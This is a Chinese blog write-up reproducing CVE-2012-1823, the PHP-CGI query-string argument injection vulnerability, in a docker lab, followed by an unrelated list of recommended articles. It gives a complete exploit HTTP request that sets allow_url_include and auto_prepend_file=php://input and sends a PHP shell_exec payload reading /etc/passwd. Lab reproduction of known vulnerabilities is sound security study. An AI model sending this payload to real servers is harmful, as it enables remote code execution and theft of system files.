您现在的位置是:首页 > 正文

CVE-2012-1823漏洞复现

2024-02-01 02:39:02阅读 3

前言

这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。

CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。

复现

在相应的漏洞环境中输入

docker-compose up -d

生成环境
访问:http://your-ip:8080
在这里插入图片描述
环境成功搭建了,接下了去复现。
访问http://your-ip:8080/index.php?-s
在这里插入图片描述
可以看到爆出了代码,证明漏洞存在的
抓包构造数据包

GET /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 192.168.104.157:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 44

<?php echo shell_exec("cat /etc/passwd"); ?>

在这里插入图片描述

网站文章

  • 代码分析(八)

    2021SC@SDUSC在我们前面分析的APIJSON中用到了一个十分频繁的对象就是JSONObject,而JSONObject时来自于FASTJSON里面的一个类,其中定义了一些方法和操作,我们来看...

    2024-02-01 02:38:55
  • 6-6 实验10_8_设计函数 void delcharfun(char *str,char ch) (100 分)

    void delcharfun(char *str,char ch){ int j; for(int i=0;i<110;i++) { while(*(str+i)==...

    2024-02-01 02:38:48
  • Qt链接Ws2_32.lib

    vs2008 下是在链接器下 空格+Ws2_32.lib 能解决问题qt是在pro文件中 加入   LIBS+= -lWs2_32   即可解决问题

    2024-02-01 02:38:20
  • 如何合并两个数组

    如何合并两个数组

    1. 遍历两个数组放入另一个 /* 遍历两个int[] 遍历放入一个数组 */ public static int[] conTwoArrays(int[] a,int[] ...

    2024-02-01 02:38:05
  • 剑指 Offer II 039. 直方图最大矩形面积

    剑指 Offer II 039. 直方图最大矩形面积

    给定非负整数数组 heights ,数组中的数字用来表示柱状图中各个柱子的高度。每个柱子彼此相邻,且宽度为 1 。 求在该柱状图中,能够勾勒出来的矩形的最大面积。 示例 1: 输入:heights =...

    2024-02-01 02:37:48
  • 如把联想电脑计算机图标放在桌面上,联想的电脑应用怎么放到桌面图标-?(图)...

    如把联想电脑计算机图标放在桌面上,联想的电脑应用怎么放到桌面图标-?(图)...

    如何将Lenovo的计算机应用程序放在桌面图标上? --- >>如何将我的计算机应用程序放置在桌面上,桌面图标似乎异常:1、该桌面图标消失,右键单击桌面上的鼠标,然后在桌面图标前面打勾。 2、桌面图标太大且不清楚,您可以调整屏幕分辨率。右键单击桌面,选择屏幕分辨率,并在调整为推荐值后按OK。 3如何将联想的计算机应用程序放置在桌面图标上如何将计算机管家软件管理放在桌面上? --- &g...

    2024-02-01 02:37:14
  • 2023 年 08 月编程语言排行榜,Julia 进入前 20

    2023 年 08 月编程语言排行榜,Julia 进入前 20

    架构师大咖 架构师大咖,打造有价值的架构师交流平台。分享架构师干货、教程、课程、资讯。架构师大咖,每日推送。公众号该公众号已被封禁TIOBE 2023 年 08 月份的编程语言排行榜已经公布,官方的标题是:Julia 第一次进入 TIOBE 指数前 20(Julia enters the TIOBE index t...

    2024-02-01 02:37:07
  • 【vulhub系列】cve-2018-1273S pring Expression Language 漏洞复现

    【vulhub系列】cve-2018-1273S pring Expression Language 漏洞复现

    记录一次cve-2018-1273S pring Expression Language漏洞复现

    2024-02-01 02:36:38
  • 游戏思考14:对cache_server缓冲服务器的问题思考(读云风博客有感)

    缓冲服务器的记录

    2024-02-01 02:36:30
  • zhang-Suen图像骨架提取(原理和代码)

    zhang-Suen图像骨架提取(原理和代码)

    转自东方fan的博客,感谢! 该算法有四个条件,若满足,则该点置为0。 或: 其中(a)(b)的意思为: 中心像素P1周围的目标像素(二值中的1)的个数之和在2和6之间。 8邻域像素中,按顺时针方向,...

    2024-02-01 02:36:22